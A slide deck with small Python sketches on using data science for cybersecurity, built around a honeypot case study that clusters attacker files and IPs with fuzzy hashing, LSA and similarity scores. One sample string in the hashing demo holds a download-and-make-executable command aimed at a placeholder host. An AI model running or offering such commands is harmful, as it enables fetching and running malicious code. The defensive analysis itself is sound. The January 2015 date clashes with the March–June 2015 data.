Applications of Data Science in Cyber-Security

Richard Xie
https://linkedin.com/in/richardxy
January 2015

What is Cyber-Security?

• Also known as:
  – computer security, network security
• Secure network assets from intrusions and data breaches
• Assets include:
  – servers, workstations, mobile devices
• Layers to secure:
  – firewalls, operating systems, files, credentials

Why Is It Important?

http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

Severe shortage of experts predicted

Cyber-Security + Data Science

Common Threats

• Exploitation of software vulnerabilities
• Fraud: spoofing, phishing, pharming
• Malicious code (worms, viruses, spyware, etc.)
• DDoS

How Would Data Science Help?

• Cyber-security is a big-data business
  – network logs
  – files
  – user-machine interactions
  – volume, velocity, variety, and veracity

• Data science is the engine that will power next-generation cyber-security solutions

Application Examples

• Spam email classification
• Malware classification
• Malicious IP classification
• Intrusion detection
• Network anomaly detection
• Hacker attribution
• and more...

A Real Case Study

• Hunting for Honeypot Attackers: A Data Scientist’s Adventure

• A honeynet is a set of honeypot systems deployed on the internet
• A honeypot logs all hacking activities
• A honeypot stores files uploaded by hackers
• Malware is used as the hackers' weapon

Raw Statistics

• Data collection period
  – from March 2015 through the end of June 2015
• >21k attacker IP addresses
• 36 million SSH attempts
• 34k unique usernames + 1 million passwords tried
• 500 malicious domains and >1000 unique malware samples identified

Geo-location of Attacks

map_hacker_IP.py

Time Series of Attacks

time_series_activity.py

What the Raw Data Look Like

Questions to Answer

• Clustering downloaded/crawled files to find file groups/categories

• Attribution
  – association between attacks from different days and IPs
  – where they came from

File Similarity Computation

• An MD5 hash can't reflect slight changes in a file: any change yields a completely different digest
• Fuzzy hashing can
• Using ssdeep, I computed pairwise similarity for all collected binary files and tar files
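To illustrate the contrast between the two kinds of hash, here is a minimal sketch using only the Python standard library. It does not call ssdeep: `difflib.SequenceMatcher` stands in as a rough similarity score, so the numbers are not what ssdeep would report. The two byte strings are made-up samples, not files from the honeypot data.

```python
import hashlib
from difflib import SequenceMatcher

# Two made-up "files" that differ by a single byte (illustrative only).
original = b"#!/bin/sh\nwget http://example.invalid/payload -O /tmp/p\nchmod +x /tmp/p\n" * 4
variant = original.replace(b"/tmp/p\n", b"/tmp/q\n", 1)


def md5_hex(data: bytes) -> str:
    """Cryptographic digest: any change produces an unrelated value."""
    return hashlib.md5(data).hexdigest()


def similarity_percent(a: bytes, b: bytes) -> int:
    """Stand-in for a fuzzy-hash comparison (assumption: NOT ssdeep).

    Returns a score from 0 (nothing in common) to 100 (identical).
    """
    ratio = SequenceMatcher(None, a, b, autojunk=False).ratio()
    return round(100 * ratio)


md5_match = md5_hex(original) == md5_hex(variant)
score = similarity_percent(original, variant)

print("MD5 digests equal:", md5_match)
print("similarity score:", score)
```

The MD5 comparison only answers "identical or not", while the similarity score stays high for near-duplicates, which is the property the pairwise file comparison relies on.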

Steps to prepare data

• readRawData.py to create a collection "downloadsCollection"

• extract_crawled_file_to_mongo.py to create crawledFileCollection

• uniq_ip_count_MR.js to create uniqURLCollection

• uniq_ip_date_MR.js to create uniqURLDateCollection

• uniq_date_ip_MR.js to create uniqDateURLCollection

• uniq_hash_count_MR.js to create uniqFileCollection

• uniq_country_count_MR.js to create uniqCountryCollection
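The MapReduce scripts themselves are not reproduced here. As a rough in-memory analogue of what a unique-count job such as uniq_country_count_MR.js might compute, the sketch below groups records by one field and counts them. The record layout, the field names (`date`, `ip`, `country`), and the sample values are assumptions for illustration, not the actual MongoDB schema.

```python
from collections import Counter, defaultdict

# Made-up records (documentation-range IPs, placeholder country codes).
records = [
    {"date": "2015-03-23", "ip": "192.0.2.10", "country": "AA"},
    {"date": "2015-03-23", "ip": "192.0.2.10", "country": "AA"},
    {"date": "2015-03-24", "ip": "192.0.2.10", "country": "AA"},
    {"date": "2015-03-24", "ip": "198.51.100.7", "country": "BB"},
]


def count_by(rows, field):
    """Map each record to its `field` value, then reduce by summing counts."""
    return Counter(row[field] for row in rows)


def group_values(rows, key_field, value_field):
    """Collect the distinct `value_field` values seen for each `key_field`."""
    groups = defaultdict(set)
    for row in rows:
        groups[row[key_field]].add(row[value_field])
    return {key: sorted(values) for key, values in groups.items()}


country_counts = count_by(records, "country")
dates_per_ip = group_values(records, "ip", "date")

print(country_counts)
print(dates_per_ip)
```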

Graph of Files

Two files are connected when their similarity exceeds a threshold (for example, 60%)

identifySimilarDownloads.py from line 166

./graphiti demo graph_data/weighted_files2.json
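The thresholding rule behind the file graph can be sketched as follows. This is not the code from identifySimilarDownloads.py. The file IDs and scores are hypothetical, and grouping files by connected components is one assumed way to read file groups off the graph.

```python
# Hypothetical pairwise similarity scores (0-100) between file IDs.
pairwise = {
    ("a", "b"): 88,
    ("b", "c"): 65,
    ("c", "d"): 20,
    ("d", "e"): 97,
}


def build_graph(scores, threshold=60):
    """Return an adjacency dict with an edge wherever score > threshold."""
    graph = {}
    for (f1, f2), score in scores.items():
        graph.setdefault(f1, {})
        graph.setdefault(f2, {})
        if score > threshold:
            graph[f1][f2] = score
            graph[f2][f1] = score
    return graph


def connected_components(graph):
    """Group nodes that are reachable from one another (depth-first search)."""
    seen, groups = set(), []
    for start in sorted(graph):
        if start in seen:
            continue
        seen.add(start)
        stack, group = [start], []
        while stack:
            node = stack.pop()
            group.append(node)
            for neighbour in graph[node]:
                if neighbour not in seen:
                    seen.add(neighbour)
                    stack.append(neighbour)
        groups.append(sorted(group))
    return groups


file_graph = build_graph(pairwise, threshold=60)
file_groups = connected_components(file_graph)
print(file_groups)
```

Raising the threshold splits the graph into more, tighter groups. Lowering it merges groups.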

Files -> Hacker

• A hacker may use the same or similar tools on different days to hack systems

• The file similarity matrix may provide hints about who was using those files

• Treat date+IP as a unique attack, and all its associated binary files as its features

• Construct a term matrix for all attacks
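A minimal sketch of the attack-by-file term matrix described above, in plain Python. The observations are made up, the `date%%IP` row label mirrors the format used in the similarity listing, and the binary presence/absence encoding is an assumption (counts or similarity weights would be alternatives).

```python
# Hypothetical observations: (date, attacker IP, file identifier).
observations = [
    ("2015-03-23", "192.0.2.10", "f1"),
    ("2015-03-23", "192.0.2.10", "f2"),
    ("2015-03-24", "192.0.2.10", "f1"),
    ("2015-03-24", "198.51.100.7", "f3"),
]


def build_attack_matrix(rows):
    """Return (attack labels, file labels, 0/1 matrix).

    Each matrix row is one date+IP attack and each column is one file.
    A 1 means the file was seen in that attack.
    """
    attacks = sorted({f"{date}%%{ip}" for date, ip, _ in rows})
    files = sorted({file_id for _, _, file_id in rows})
    row_index = {attack: i for i, attack in enumerate(attacks)}
    col_index = {file_id: j for j, file_id in enumerate(files)}

    matrix = [[0] * len(files) for _ in attacks]
    for date, ip, file_id in rows:
        matrix[row_index[f"{date}%%{ip}"]][col_index[file_id]] = 1
    return attacks, files, matrix


attacks, files, matrix = build_attack_matrix(observations)
for label, row in zip(attacks, matrix):
    print(label, row)
```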

T-SNE on Attack-Malware Matrix with K-Means Labeling

T-SNE: t-Distributed Stochastic Neighbor Embedding

get_similar_IPs.py from line 181

Latent Semantic Analysis

• LSA is widely used in NLP for topic finding
• Analyzes relationships between a set of documents and the terms they contain
• Uses SVD to reduce the number of dimensions while maintaining record similarities

SVD: Singular Value Decomposition
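The dimensionality-reduction step can be sketched with NumPy's SVD. The small matrix is hypothetical (rows are attacks, columns are files), and `k=2` is an assumed choice that keeps only the two strongest components.

```python
import numpy as np

# Hypothetical attack-by-file matrix: 4 attacks (rows) x 4 files (columns).
A = np.array(
    [
        [1, 1, 0, 0],
        [1, 1, 1, 0],
        [0, 0, 1, 1],
        [0, 0, 0, 1],
    ],
    dtype=float,
)


def lsa_embed(matrix, k=2):
    """Project each row onto the top-k singular directions (truncated SVD)."""
    U, s, Vt = np.linalg.svd(matrix, full_matrices=False)
    # Row coordinates in the reduced space: U_k scaled by the singular values.
    return U[:, :k] * s[:k]


embedded = lsa_embed(A, k=2)
print(embedded.shape)
print(np.round(embedded, 3))
```

Keeping every component reproduces the original row-to-row inner products exactly. Truncating to a small `k` keeps the dominant structure and discards the rest, which is why similar rows stay close together in the reduced space.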

Attacks Expressed with 1st and 2nd Principal Components

Each vector is a date+IP incident (a row in the term matrix)

Compute Similarities among Attacks

• Attacks similar to a particular one: 2015-03-23%%61.160.212.21:5947 is similar to
  – 2015-03-23%%118.193.241.192, similarity 0.958453
  – 2015-03-23%%222.186.190.157:56789, similarity 0.996835
  – 2015-03-24%%222.186.190.157:56789, similarity 0.961000
  – 2015-03-25%%117.21.176.79:333, similarity 0.997087
  – 2015-03-25%%222.186.190.157:56789, similarity 0.946751
  – 2015-06-17%%222.186.30.175:56789, similarity 0.996835
  – 2015-06-17%%61.160.247.42:1988, similarity 0.996835
  – 2015-06-18%%222.186.30.175:56789, similarity 0.996835
  – 2015-06-18%%61.160.247.42:1988, similarity 0.996835
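The slides do not state which similarity measure produced these scores. A common choice for vectors in a reduced space is cosine similarity, sketched below under that assumption. The attack names, vectors, and the 0.9 cutoff are hypothetical.

```python
import math


def cosine_similarity(u, v):
    """Cosine of the angle between two equal-length vectors."""
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    if norm_u == 0 or norm_v == 0:
        return 0.0  # convention chosen here for all-zero vectors
    return dot / (norm_u * norm_v)


def most_similar(target, vectors, min_similarity=0.9):
    """List other attacks whose similarity to `target` meets the cutoff."""
    reference = vectors[target]
    scored = [
        (name, cosine_similarity(reference, vec))
        for name, vec in vectors.items()
        if name != target
    ]
    matches = [pair for pair in scored if pair[1] >= min_similarity]
    return sorted(matches, key=lambda pair: pair[1], reverse=True)


# Hypothetical 2-D attack vectors (e.g. rows of a reduced matrix).
vectors = {
    "attack-A": [1.0, 0.1],
    "attack-B": [0.9, 0.2],
    "attack-C": [0.0, 1.0],
}

similar = most_similar("attack-A", vectors)
for name, score in similar:
    print(f"{name}, similarity {score:.6f}")
```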

Time Series of Attack Counts for Group 1

Time Series of Attack Counts for Group 2

Visualization of Attack Graph

./graphiti demo graph_data/weighted_IPs_95percent.json

We know where they were from

python_map_IP_latlon.py

So what?

• The analysis may lead to
  – near-real-time attribution (is it a new attack, or something we saw before?)
  – near-real-time triage (is it new malware, or a variant of an existing one?)
  – more...
